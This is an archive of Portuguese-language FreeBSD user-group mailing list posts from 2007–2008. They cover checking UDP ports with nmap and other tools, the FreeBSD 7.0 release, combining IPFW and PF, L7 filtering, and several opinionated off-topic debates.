>  161/udp  closedsnmp
>  5060/udp open|filtered sip
>  6554/udp closedunknown
>  MAC Address: 00:1C:10:56:D7:54 (Unknown)
>
>  Portanto perfeito, é a unica porta ativa mesmo.
>
>  Resumindo a opera: se seu host de target tem blackholes ou firewall
>  fechando icmp familia 3, esqueça! Não há como ter uma resposta confiave.
>
>  Porem, se não for o caso (e 90% das vezes não é) o nmap tem resultados
>  confiáveis. Entao podemos afirmar certamente que seu host de testes ou
>  filtra icmptype 3 ou esta com blackholes de UDP. Teste em outro target com
>  nmap e veja.
>
>
>  --
>  Patrick Tracanelli
>  (31) 3516 0800
>  sip://[EMAIL PROTECTED]
>
>
>
>  -
>  Histórico: http://www.fug.com.br/historico/html/freebsd/
>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] OT - UDP checar porta

[Evandro Nunes]

Ola pessoal

seguinte, ontem tive que fazer um script com algo q eu achava q seria
trivial, e foi um fracasso

quero testar se uma porta UDP num servidor remoto esta aberta

testei com netcat, nc -dozu pois faco perfeitamente com -doz com proto
tcp, e nada, a propria pagina de manual indica que nao funciona

depois fiz um script perl usando net::ping e tambem eh impreciso pra UDP

ai testei com o hping e ele flooda a porta sem deixar claro se ela ta
ouvindo ou nao

ai testei com nmap e vi que mesmo o nmap nao tem resultados coesos e
confiaveis, dizendo open|filtered na maioria das portas, inclusive as
sabidamente ouvindo...

uma coisa  qachei seria simples, se mostrou um problemao

aos hackers de plantao, como posso fazer isso de forma que o resultado
seja confiavel?

Testei o check_udp do nagios e tambem é um fracasso irmao hehehe

por isso tem check_dns, check_radius, tudo separado... parece que nada
checa UDP de forma generica confiavel...

valeu
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] 7 RELEASE A SOLTA

[Evandro Nunes]

On Wed, Feb 27, 2008 at 10:41 AM, Giovanni Tirloni <[EMAIL PROTECTED]> wrote:
> 2008/2/27 Evandro Nunes <[EMAIL PROTECTED]>:
>
>
>  > On Wed, Feb 27, 2008 at 10:28 AM, Evandro Nunes
>  > <[EMAIL PROTECTED]> wrote:
>  > > Ué pelo que eu li aqui http://www.fug.com.br/ nem saiu oficialmente
>  > ainda.
>  > >
>  > >  E povo apressadinho ;)
>  >
>  > eu ja ouvi falar de site atualizado, mas tem ate banner pra download
>  > de um sistema q nem saiu
>  >
>  > http://img249.imageshack.us/img249/2788/fugshotog4.jpg
>  >
>  > isso sim que eh pressa kekeke
>
>
>  E quanto mais todo mundo correr para fazer download do freebsd.org, mais
>  tempo vai demorar para os mirrors se atualizarem e todo mundo perde, thanks!

Nada a ve. As sincronias de mirror oficiais sao feitas pelo
ftp-master.freebsd.org e cvsup-master.freebsd.org, respectivamente pra
cada tipo de mirror, que nao aceitam acesso anonimo e tem preferencia
de banda. Nao prejudica em nada. E normalmente a falta de sincronia
entre mirrors eh causada pela diferenca de timezone nos scripts
oficiais de sincronia ou pela falta de intervencao manual do sysadmin
dos mirrors, por isso eh enviado um e-mail na lista de mirrors
solicitando inicio da sincronia manual quando possivel.

A unica consequencia eh o limite de acesso simultaneo no servidor
oficial, seria melhor se tivessemos todos mirrors disponiveis. Mas
atrapalhar os mirrors nao atrapalha nao.

>
>  --
>  Giovanni
>
>
> -
>  Histórico: http://www.fug.com.br/historico/html/freebsd/
>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] 7 RELEASE A SOLTA

[Evandro Nunes]

On Wed, Feb 27, 2008 at 10:28 AM, Evandro Nunes
<[EMAIL PROTECTED]> wrote:
> Ué pelo que eu li aqui http://www.fug.com.br/ nem saiu oficialmente ainda.
>
>  E povo apressadinho ;)

eu ja ouvi falar de site atualizado, mas tem ate banner pra download
de um sistema q nem saiu

http://img249.imageshack.us/img249/2788/fugshotog4.jpg

isso sim que eh pressa kekeke

>
>
>
>  On Wed, Feb 27, 2008 at 8:59 AM, Lucas Ducati <[EMAIL PROTECTED]> wrote:
>  > Fala povo da FUG.
>  >
>  >  O RELEASE 7.0 já saiu...
>  >
>  >  ftp://ftp.freebsd.org/pub/FreeBSD/ISO-IMAGES-i386/7.0/
>  >
>  >  Abraço a todos
>  >
>  >  Lucas Ducati
>  >
>  >
>  >
>  >
>  >   Abra sua conta no Yahoo! Mail, o único sem limite de espaço para 
> armazenamento!
>  >  http://br.mail.yahoo.com/
>  >  -
>  >  Histórico: http://www.fug.com.br/historico/html/freebsd/
>  >  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>  >
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] 7 RELEASE A SOLTA

[Evandro Nunes]

Ué pelo que eu li aqui http://www.fug.com.br/ nem saiu oficialmente ainda.

E povo apressadinho ;)

On Wed, Feb 27, 2008 at 8:59 AM, Lucas Ducati <[EMAIL PROTECTED]> wrote:
> Fala povo da FUG.
>
>  O RELEASE 7.0 já saiu...
>
>  ftp://ftp.freebsd.org/pub/FreeBSD/ISO-IMAGES-i386/7.0/
>
>  Abraço a todos
>
>  Lucas Ducati
>
>
>
>
>   Abra sua conta no Yahoo! Mail, o único sem limite de espaço para 
> armazenamento!
>  http://br.mail.yahoo.com/
>  -
>  Histórico: http://www.fug.com.br/historico/html/freebsd/
>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OT]Oportunidade de emprego no Terra (Porto Alegre)

[Evandro Nunes]

2008/2/8 Eduardo Meyer <[EMAIL PROTECTED]>:
> 2008/2/8 Klaus Schneider <[EMAIL PROTECTED]>:
> > Palhaçada, as empresas como o terra olham pro diploma que o cara tem em
> > baixo do braço não pelo que o cara sabe... Trabalho a 8 anos com unix e
> > redes e já tinha bons conhecimentos quando comecei a usar linux em 1994.
> >
> > Já tenho pelo menos 8 anos de experiência em freebsd, solaris, unix, linux,
> > windows, cisco, roteamento(bgp, ospf), e eles querem saber se eu terminei o
> > maldito curso de ciências da computação que mal ensina como instalar o
> > wireshark no windows...
> >
> > Não estou criticando aqueles que terminaram a ciência da computação, mas sim
> > quem contrata alguém sem experiência nenhuma só porque esta "formado". Mesmo
> > porque, acredito que todos que estão na lista e são formados, aprenderam a
> > fazer o que sabem não na faculdade, mas na prática, com muito esforço. E o
> > pior, muitos tem formação em engenharias não afins, arquitetura, química,
> > física, matemática, e tem um conhecimento invejável mas não podem concorrer
> > a vagas como essa, pq eles querem alguém com formação em ciências malditas
> > da computação...
> >
> > Desculpem o desabafo, mas é a realidade
>
> Esse é só o seu ponto de vista, e ele é altamente limitado. O que por
> si só já serviria como um ponto auxiliar na tomada de decisão na
> disputa por uma vaga. Reforçado pelo fato de que essa nossa profissão
> não é regulamentada, não tem um conselho e não tem supervisão. Existem
> em outras áreas profissionais auto-didatas tão bom quanto ou melhores
> que os formados, mas por ser regulamentadas não tem esse tipo de
> pedância frequentemente argumentada.
>
> Por outro lado tem os malditos "auto-didatas" que só fazem merda e
> ainda prostituem o mercado. "Porque vou te pagar X pra um firewall se
> o zezinho cobra X/20 pro mesmo serviço"?
>
> Então eu te pergunto, você que tem pelo menos 8 anos de experiência em
> freebsd, solaris, unix, linux, windows, cisco, roteamento(bgp, ospf),
> você certificados Sun, IBM, LPI, MSXX, CCNX, BSDA, etc? Se tem,
> provavelmente tem vantagem com um mero formado em terceiro grau em
> qualquer concorrencia por uma vaga, porque ao contrario do que voce da
> a entender o mercado e os contrantantes não são tão topeiras assim.
>
> Agora se voce tem 8 anos em sabe-deus-o-que, nenhum certificado e
> sequer terceiro grau (sim, sequer terceiro grau, pra voce provar que
> pelo menos sabe fazer uma derivada, ou se lembra de matematica da
> quinta-serie), seus "8 anos de experiencia" são a sua palavra, contra
> um diploma de um formado. E esse diploma pode não dizer nada,
> dependendo da faculdade. Mas pode dizer muito, dependendo do mesmo
> fato. E por ultimo, se o outro candidato tambem for experiente e
> profissional da area, ambos com a mesma qualificacao, na hora da
> tomada de decisao voce acha que pesa pra quem? "contrata o
> não-formado, ambos tem os mesmos X anos de experiencia mas eu prefiro
> os nao formados porque nao perderam seu tempo com o maldito curso de
> CC".
>
> Sinceramente rapaz, voce que nao expanda seus horizontes não. e eu sou
> formado, e concordo que a porcaria da formacao nao representa hoje 2%
> do que eu faço; mas não acho que foi uma perda de tempo me formar;
>
> Afinal, a diferença entre alguem "bom no que faz" e outra pessoa "boa
> no que faz" pode ser o fato "desse infeliz sequer ter o terceiro
> grau". Acredite, ensino e educação não deveria ser algo "opcional"
> nessa porcaria de pais, e tão pouco ser taxado de inutil e maldito. Um
> povo sem educação fica assim, exatamente assim...
>
> Muita prepotencia achar que seus 8 anos de experiência te tornam
> melhores que um profissional recém formado. Não é uma referencia a
> você, eu não te conheço. É valido pra qualquer pessoa, porque 8 anos
> podem nao signifcar nada, e alguem recem formado pode ter feito mais
> da vida do que apenas cursar uma faculdadezinha. E em todo caso o
> segundo conseguiu concluir (ou curosu 90%, como no caso da descrição).
>
> Isso tudo porque esse raio de profissão não é regulamentada...
>
> So um detalhe: entrevistei um candidato que se diz ter 10 anos de
> experiencia em FreeBSD e Linux (veja bem, é praticamente a idade
> desses sistemas), e ao procurar sobre ele no google, descobri que ha
> menos de 2 meses de acordo com o historico de uma lista, ele não
> conseguia fazer um mero Qmail com simscan funcionar corretamente
> seguindo um desses how-to de internet da vida. Bom, pra mim isso
> ilustrou bastante o valor dos 10 anos de experiência.
>
> Não me leve a mal, mas
>
> http://www.fug.com.br/historico/html/freebsd/2001-07/msg00651.html
>
> Uma pessoa com 8 anos de experiência deveria conhecer tcpdump. E com
> tcpdump "enxergaria" que o segundo desvio (divert = desvio em
> portugues) não poderia ser pra rede falsa, ja que o pacote vindo da
> internet nunca viria com destino a rede falsa.

nuzzz senhora pegou PESADO hein? depois dessa eu "pedia pra sair" hiohhohihio

mas sem d

Re: [FUG-BR] RES: Stallman hipocrita mentiroso

[Evandro Nunes]

On Dec 14, 2007 2:33 PM, Dimitri - dalme.adm <[EMAIL PROTECTED]> wrote:
> Srs.,
>
> O RS está completamente errado, mas informo aos caros membros desta lista
> que também não adianta atacarmos os LNX Users, pois muitos dos mesmos pensam
> exatamente como nós. Falo como membro e usuário dos dois padrões de S.O. e
> ainda como defensor ferrenho do OpenBSD.
>
> Mas ressalto que o RS está mais que errado. Tá na hora do mesmo voltar às
> origens. Se bobear o mesmo só quer aparecer. Lembro que a comunidade Linux
> já age sozinha e faz tempo que é assim.
>
> Viva o GPL! Viva os BSD´s

uma parte da comunidade Linux anda com suas próprias pernas hoje.

uma parte menor comunidade GNU também mas isso não faz tanto tempo
assim. há 5 anos, em meados de 2002->2003 ninguém se atrevia a falar
que John Maddog Hall estava errado em alguma coisa, que RMS estava
errado, que o Torvalds estava errado, ou o tiozinho do Bazar e da
Catedral estavam errados.

e já estavam, esses conceitos errados repetidos hoje são exatamente os
mesmos, há decadas repetidos, repetidos, repetidos... e dizem que uma
mentira quando repetida severas vezes torna-se verdade, pois bem, para
uma boa parte da comunidade LX se tornou

- eu tenho vergonha de ter o lula como presidente

- e como membro de uma comunidade open source livre, tenho vergonha
que o stallman seja o nome de referencia na representatividade dessa
comunidade

- o lula nao me representa em seu cargo
- o senado nao me representa e os senadores do meu estado tambem nao

- stallman nao me representa em relacao a posicoes e opinioes sobre SL

eu nao consigo pensar em um unico grande movimento de SL linux q nao
tenha sido orquestrado por esses nomes que eu citei, entao nao
concordo q a comunidade linux age sozinha faz tempo; talvez aja, mas n
pensa sozinha...

o primeiro movimento de acao independente eh recente, o
desenvolvimento de tantos reursos de virtualizacao no linux, os quais
o tornam uma referencia nesse campo da tecnologia, e acontece com
total falta de interesse declarado do torvalds

isso eh bem recente e bem pouco pra eu pensar q essa comunidade seja
independente dessas pessoas

se o fosse, hoje o gerenciamento de memoria do linux seria o criado
pelo Riek Van Riel

se o fosse dentre 3 escalonadores novos para o linux, o CFS nao teria
sido o escolhido

esses sao apenas exemplos de decisoes unilaterais, que nao
correspondem as expectativas da comunidade de desenvolvedores; e a
comunidade linux? engoliu guela abaixo e nem discute mais... se o CFS
seria a melhor opcao, e todos os developers (q eram a maioria dos nao
financiados pela red hat) q queriam codigo do Riel na arvore apenas
acataram a decisao de nao o ter, mesmo sem concordar...

pelo menos a comunidade linux hj eh mais critica e enxerga q nem todas
as "verdades" pregadas q foram repetidas para catequizar novos
usuarios, sao de fato "verdades"... mas é uma distorção há muito tempo
feita, repetida, e reforçada... e hoje seria um passo enorme para trás
reconhecer essas, como inverdades - afinal o que pensaria quem ver
isso acontecendo? a maioria vai preferir insistir nessa "verdade"
utopica e fantasiosa do software livre, inventada pelo stallman

me lembro recentemente quando a microsoft pegou a implementacao do
mpich, transformou em um produto e tornou o sistema de clusterizacao
do windows server possível; o que a comunidade livre fez? a minha
comunidade ressaltou quais eram as origens do mpich, fez benchmarks e
mostrou q o MPI open source traz melhores resultados

a comunidade linux (de stallman à outros do baixo clero) reclamou,
bateu o peh, chorou, pq a microsoft fez um MPI com tres variacoezinhas
q se tornaram novas features e queriam isso de volta, e preguejaram
contra qualquer geracao passada e futura de cada ser humano na terra
que nao usar/tornar seu codigo GPL

agora vou fazer uma analogia dessas que sao o famoso "cagar na saida" hahaha

no que tange a apropriacao indebita, a comunidade linux sao como a
comunidade emo

- os emo se apropriam de estilos, roupas, forma de se vestir de outros
movimentos, acessorios vintage, cortes de cabelo, que originalmente
nunca foram parte do movimento emo, juntam tudo e tornam isso emo;
original deles é apenas a facilidade com que choram e reclamam das
injusticas da vida

- os linuxers se apropriam de estilos, conceitos de outros movimentos,
filosofias, acessorios, se deixar até de código (freebsd e openbsd q o
digam) de outros movimentos, que originalmente nunca foram criados por
eles, juntam tudo e tornam isso tudo, software livre linux; original
deles é apenas a facilidade com que choram e reclamam das injusticas
da vida

- quando stallman pela primeira vez enviou um e-mail, ele passou por
uma pilha de rede open source livre, sob licenca BSD, na arpanet

- quando stallman pensou pela primeira vez em compartilhar codigo
aberto, Ken Thompson ja tinha enviado o famoso "Love, Ken" pra
inumeras universidades, muitos anos antes

- quando stallman pensou pela primeira vez em uni

Re: [FUG-BR] Filtro L7

[Evandro Nunes]

On Oct 3, 2007 3:29 PM, Daniel Loureiro <[EMAIL PROTECTED]> wrote:
> Bom dia,
>
> sou iniciante no FreeBSD, e gostaria de fazer filtragem na camada 7.
> Ex.: dar uma certa banda para emails, bloquear msn para alguns ips,
> fazer gráficos por protocolo, etc. No linux eu uso o iptables +
> filter-l7, mas no freeBSD eu não achei nada parecido.
>
> Eu sei que é possível fazer isso na camada 3, usando portas e ips que
> estes programas usam, mas acho isso muito "gambiarrado" e frágil.

irmão tu tem que rever um pouco seus conceitos de rede, gambiarra é
ponteiro descontrolado em kernel fazendo regexp de string, controlar
tráfego na camada 3 é a coisa mais adequada e segura possível, não é a
toa que é a forma mais tradicional

> Afinal, se eu faço shaping em uma porta, o usuário pode usar outra.
>
> Perguntando ao Google, ele me mostrou uma mensagem antiga dos
> desenvolvedores do ipfw dizendo que não implementariam layer 7 pois
> seria algo baseado em expressões regulares, o que, além de ser lento,
> poderia dar falsos-positivos ou falsos-negativos.

o que é a mais pura verdade, vide a tabela a "precisão" dos módulo L7
do linux, a maioria dos protocolos tem uma boa chance de ser
falso-positivo, e falso-negativo então é 98% de chance irmão, dai tu
se apega nos outros 2% restante se liga na marmita? se não saca só:

no linux você usa uma gambi q eles chamam de conntraq pra rastrear
conexão, e dai da um match de camada 7 (q pode ser falso) e joga pro
conntraq e no final das conta a banda ou o filtro voce controle é na
camada 3 dos pacotes q passam naquema "conn"q  ta sendo rastreada,
sacou? dai só pra ilustrar o tamanho do seu engano em achar q camada 3
é furada, camada 3 é o a única viável de verdade, aí tu se apega em
como trabalhar a classificação do jeito que deseja se liga? os linuxer
fazem em kernel, e isso pra qualquer especialista em segurança é
simplesmente errado
>
> Porém, eu já trabalhei com o filter-l7 do linux e sei que funciona muito
> bem. Além disso, dado o poder atual dos processadores, esta métdo não
> interfere na velocidade de transmissão.

entao tu sabe bem q o L7 eh apenas para classificar

>
> Entre as hipóteses que pesquisei:
> * netgraph: achei muito complexo, praticamente precisa ter que programá-lo.
> * ipfw + divert: não dá, o ipfw pega só o cabeçalho do protocolo, assim,
> não tem o que eu filtrar.
> * snort_inline: usa o mecanismo acima, e portanto em nível L2/L3;

não viaja irmaozinho, divert manda o pacote inteiro e você faz com ele
o que quiser, e nao tem nada de L2 na estoria

> * hackear o ipfw: complexo, mas parece mais simples que usar o netgraph;
> * ipfw + pipes: é possível usar pipes para enviar tráfego para meu
> programa ? o ipfw envia os dados para o pipe ou só o cabeçalho ?

envia tudo pro pipe mas nao da pra desviar pra programa nao

pra mandar pra programa tu faz com divert

>
> Enfim, alguém já teve uma experiência deste tipo, ou tem alguma idéia ?

minha experiencia é usar snortsam jogando os peers pra 2 tables e ai
tu mete eles num pipe e ja era, vai pra casa, pega um dia de folga e
vai aproveita sua namorada num dia improvavel a tarde, (ela vai
adorar) porque tudo vai funcionar sem vc precisar estar por perto,
como de costume com freebsd

>
> Sds,
> Daniel Loureiro.
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Compatibilidade do FreeBSD com EMT64

[Evandro Nunes]

ai irmão eu n to ligado se foi essa a intenção da sua pergunta, mas
vamos ao que é relevante ai

você não vai instalar freebsd i386, vai instalar amd64, ok? O FreeBSD
vai se comportar com maestria, "working like a charm" como os nerd
fala nos canal de irc por ai

dai irmão é só felicidade, rodar freebsd/amd64 em processador com
extensão EMT64 da uma baita diferença até nos processadorzinho mais
ordinário, tipo Pentium D

em Quad eu ainda não rodei mas já da diferença em Duo

uma consideração que se pá voce vai levar em conta é que tem umas
aplicação ai que não se comportam bem com amd64, o que não tem nada a
ver com freebsd, tipo nessus eu tive altos problemas doidos em 64bits,
e nao rodou estavel nao

o irmão se tu mencionar as aplicacao que pretende rodar talvez a
galera possa comentar algo mais a respeito pa, afinal apliacao é o que
vai contar, porque quanto ao freebsd irmão, é tiro certo, batata na
mosca cinza na bolinha preta do alvo, tipo se for usar pra rotear,
controlar banda, pra firewall, essas paradinha do kernel, dai nem
precisa pensar de novo: já devia ter instalado ;)

On Nov 21, 2007 3:03 PM, Alex Moura <[EMAIL PROTECTED]> wrote:
> Prezados,
>
> Alguém pode compartilhar - pode ser em pvt - sua experiência do
> FreeBSD rodando em servidor Dell PE2950 com processadores EMT64?
> Gostaria de saber se há alguma limitação ou recomendação,
> principalmente com relação aos ports?
> Alguma diferença relevante em relação à plataforma i386?
> A máquina deverá rodar principalmente rrdtool e nfsen/nfdump e serviço
> web (apache/lighttpd) com suporte a PHP. Futuramente é possível ser
> necessário rodar servidor mysql ou postgresql.
>
> Acredito que o FreeBSD-7 deve aproveitar bem - por default - os
> recursos desta especificação abaixo, mas pode ser que você tenha
> alguma dica/recomendação de configuração/otimização (p.ex.: habilitar
> o scheduler ULE).
>
> # 2 Processadores Intel Xeon E5310 Quad Core de 1.60 Ghz (EM64T)
> # 4 GB de memória FBD - 667 MHz (2x2GB) - 2R
> # Discos rígidos de 300GB SAS de 3.5" e 10.000 rpm
> # Controladora  de array integrada (PERC 5/i) SAS/SATA
> # Placa de rede Intel 1000PT Dual Port PCI-e
>
> Agradeço antecipadamente,
>
> Alex
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] SERVIÇO'

[Evandro Nunes]

On Nov 21, 2007 3:48 PM, Eduardo Meyer <[EMAIL PROTECTED]> wrote:
> Quando preciso, recomendo aos meus parceiros a FreeBSD Brasil para
> esses serviços. Eles tem um padrão de trabalho e trabalham com SLA,
> garantia, essas coisas que uma empresa oferece. Principalmente é uma
> empresa, com telefone, e-mail, que te da garantia que não vão "sumir",
> "te deixar na mão", ou não atender por sobrecarga, etc, de repente,
> que acontece algumas vezes quando se depende de freelancers.

tai irmãozinho bom saber dessas parada ai eu dou um trampo aqui e nas
horas vagas sou freelancer pra pagar a gasosa 3galo, e as vezes
preciso indicar alguem pra me substituir, freebsd brasil é la do jean
e do patrick né não? eles lançaro esses dia ai um site de camiseta e
cd e irma de geladeira né não? aquele chaveiro do capeta é puta
estilosão pra caralho, comprei uma camiseta e ele pra vê qual que é e
cai a cara com a chaveiro, bacana a bagaça e tambem a iniciativa da
loja que eles mantém

dai irmão voltando ao assunto eu sou um desses freelancer que tá
sempre deixando alguns clientes na mão por falta de tempo, e o que
mais pega é que tem uns camarada que arruma uns mlk de linux pra por a
mão nos bsd que a gente faz com tanto carinho e dai quando vai ve já
tem rc.local iniciando serviço, script .sh carregando rota no
/etc/rc.d nego é porco demais, dai não funciona e não sabem o porque,
é uma boa ter uma empresa com quem contar mesmo, se ela for
especializada,

só que o meu preço é um pouquinho mais em conta rs rs então posso
recomendar eles como backup de mim mesmo rs rs rs ja que quando os 2
servicos sao bons o preco faz a diferenca

>
>
> On Nov 21, 2007 12:47 AM, Danilo Lopes <[EMAIL PROTECTED]> wrote:
> > Boa noite pessoal, gostaria de saber se alguém da lista faz serviço de
> > implantação de servidor FREEBSD.
> >
> > O caso é o seguinte, tenho um servidor FREEBSD aqui, mas foi instalado por
> > um camarada que não está mais aqui na cidade.
> >
> > Vou fazer a instalação do freebsd num micro novo, e posso passar o usuario e
> > senha pra pessoa acessar meu server atual, e por ele acessar o micro novo
> > que vai ficar como servidor de internet.
> > A estrutura que desejo é simples, quero a navegação com autenticação, e 3
> > grupos de usuarios, 1 liberado geral, 1 com acesso a  *.gov e outro com
> > alguns sites liberados.
> > e também controle de banda, só pra eu conseguir definir a banda que cada
> > usuario vai ter acesso pra navegação.
> >
> > Alguém interessado em fazer este serviço ?
> > interessados entrar em contato comigo para tentarmos alinhar.
> > [EMAIL PROTECTED]
> >
> > Tenho urgência.
> >
> > Abraços.
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>
>
>
> --
> ===
> Eduardo Meyer
> pessoal: [EMAIL PROTECTED]
> profissional: [EMAIL PROTECTED]
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Misturar IPFW e PF

[Evandro Nunes]

jeito q
faz a mesma coisa e funcione ou resolve os problema que eu citei nos
exemplos, puder fazer, eu vou agradecer e ficar contente em poder me
redimir e pedir desculpa ta ligado? porque nao tenho prazer em
esculacha o firewall alheio nao

 mas os nego do openbsd esculachou o firewall do darren reed por causa
de uma mudanca na licenca, mas o ipf tinha "with op " tinha
tambem "group" e tinha "short fragment" pa alem de outros lance que
nem me lembro mais de tanto tempo que faz (nostalgia dos firewall
hein) dai nem esseslance que ja tavam prontos o pf tem e era so manter

 palavras de alguem q usava openbsd com ipf e que nao ficou super
empolgado quando o pf apareceu - pq apesar de um mundo de coisa nova
muito interessante, outras coisa boa nao foram mantidas e nem
substituidas, foram removidas simplesmente, ou "resumidas" a um scrub
da vida, pa



>
> ate.
>
> Em 16/10/07, Evandro Nunes<[EMAIL PROTECTED]> escreveu:
> > irmão pode usar sem problemas
> >
> > so se lembre que o pf é processado primeiro e depois o ipfw entao por
> > exemplo se bloqueou no ipfw nao adianta ter liberado no pf
> >
> > outra coisa que voce tem que lembra irmão é que pelo motivo do pf ser
> > processado primeiro quando voce chegar no ipfw o nat do pf ja vai ter
> > acontecido, então os IPs ja vao tar traduzido, beleza?
> >
> > no mais pode usar os dois sem problema
> >
> > eu uso motivado pela mesma coisa que voce, porque o altq é muito
> > bonzinho pra quem meche com poucas filas, pra ter dezenas, centenas de
> > filhas tem q configurar uma por uma na mão, com ipfw tem pipe e queue
> > dinamico que é uma maravilha do outro mundo (ha ha exagero? sai de um
> > background com Linux e TC onde voce tem 4 arquivos de configuracao por
> > HOST pra fazer o que no ipfw agora eu faco "dinamico" com mask e voce
> > vai ve que nao eh exagero nao)
> >
> > alias irmao ve direito pra que voce precisa de pf
> >
> > pf so vale a pena se voce tem que fazer balanceamento de saida com
> > multiplos links, que no ipfw ate faz mas nao tem stick address entao
> > fode o esquema, alem disso no ipfw e muito dificil e confuso, no pf
> > faz sozinho
> >
> > se nao for isso, ou se nao for a necessidade nat-pool que o natd
> > tambem nao faz, se for um nat normal ou so saida por multiplos links
> > sem balancear dai o PF e so pra criar confusao ele e dispensavel
> > totalmente
> >
> > ah e pf tambem nao filtra metade dos ipoptions e tcpoptions que o ipfw
> > filtra entao como firewall propriamente dito pf eh mediocre perto do
> > ipfw
> >
> > mas tem umas feature mo bacana como nao matar state no reload das
> > regras, poder adicionar e remover um ip do pool, essas coisas. ah mas
> > pool volta no nat, e nisso, pf é impecavel, se voce precisa de coisa
> > avancada no nat
> >
> > On 10/15/07, João Paulo Just <[EMAIL PROTECTED]> wrote:
> > > Olá, pessoal.
> > >
> > > Gostaria de misturar o IPFW com o PF da seguinte forma: IPFW fazendo
> > > controle de banda e PF fazendo NAT.
> > >
> > > Porque isso? Porque não fazer tudo no PF?
> > >
> > > O problema é que uso controle de banda dinâmico no IPFW da seguinte forma:
> > >
> > > -- ipfw.rules --
> > > # Download
> > > ipfw pipe 1 config bw 150Kbit/s mask dst-ip 0x
> > > # Upload
> > > ipfw pipe 2 config bw 150Kbit/s mask src-ip 0x
> > >
> > > ipfw add pipe 1 ip from not me to 172.16.16.0/20 in via rl0
> > > ipfw add pipe 2 ip from 172.16.16.0/20 to not me in via tun*
> > > 
> > >
> > > E não sei como fazer isso no PF, não consegui achar como fazer, e até já
> > > pedi auxílio à lista há um tempo atrás e ninguém pôde me ajudar (se
> > > alguém tiver a solução, me ajude).
> > >
> > > Então, pra continuar com o controle de banda do IPFW, qual seria a
> > > melhor forma de misturar os dois? Se eu tirar a NAT do IPFW e botar no
> > > PF direto vai funcionar tranquilo?
> > > -
> > > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> > >
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] RES: ocs or para fazer inventario de maquinas win!?!

[Evandro Nunes]

On 10/16/07, Diego Queiroz dos Santos <[EMAIL PROTECTED]> wrote:
> hum,certo.. é que no manual do ocs diz que pode usar o 1.3 tambem (pag
> 10) .. o apache que eu tenho é 1.3.39_2 e o mod_perl é 1.30

é pode cre brother na documentação fala que pode ser apache 1.3, mas
não fala o que fazer quando da pau nos módulo perl que depende do apr
que é uma treta cheia de maracutaia que só o apache 1.3 precisa entao
basicamente se tu fizer tudo funcionar, a pagina 10 do manual do ocs
vai ta certa, ai que entra o lance ja que o problema que voce ta tendo
é do perl com apr, e nao do ocs, e a pagina 10 do manual do ocs nao
preve esse erro he he he

mas dai tu pode ir com fé irmão no apache20 mas se preferir o 1.3
mesmo atualiza o perl inteiro ai, ou pelo menos os modulos perl pois o
APR.so seu ta linkando pra uma biblioteca que não existe se liga? vai
vê ele é meio velho
 o primeiro passo pra tentar corrigir caso você insista no 1.3 é:

portupgrade p5-\*

dai se não rolar portupgrade perl\* - deve ser suficiente mas nao
esquece de atualiza o ports antes ou então vai de apache20 e não
esquenta.

 salve salve


>
> Em 16/10/07, Evandro Nunes<[EMAIL PROTECTED]> escreveu:
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] 7.0-RELEASE sai ou não sai?

[Evandro Nunes]

On 10/16/07, Patrick Tracanelli <[EMAIL PROTECTED]> wrote:
> Evandro Nunes escreveu:
> > parece que o 7 está congelado há decadas já, até ja perdi a conta
>
> Nao exagere. Está congelado desde a data prevista pro seu congelamento,
> Junho de 2007.
>
> http://www.freebsd.org/releng/
>
> >  agora estão tirando os sensoreso do OpenBSD fora e tem uma noticia no
> > site da fug falando que o escalonador de que tanto se fala não vai
> > estar por padrão no 7
>
> O que era de se esperar. Você conhece algum projeto open source mais
> conservador que FreeBSD?
>
> > porque ta demorando tanto? ta quanto tempo atrasado?
>
> Olha, opiniao pessoal. Eu nao acho que esteja demorando, e se esta
> atrasado que tem a nocao do atraso, são apenas os desenvolvedores,
> porque pra nos, usuários, todo o cronograma de agenda que tivemos acesso
> (o que foi publicamente divulgado na URL acima) está sendo seguido.
>
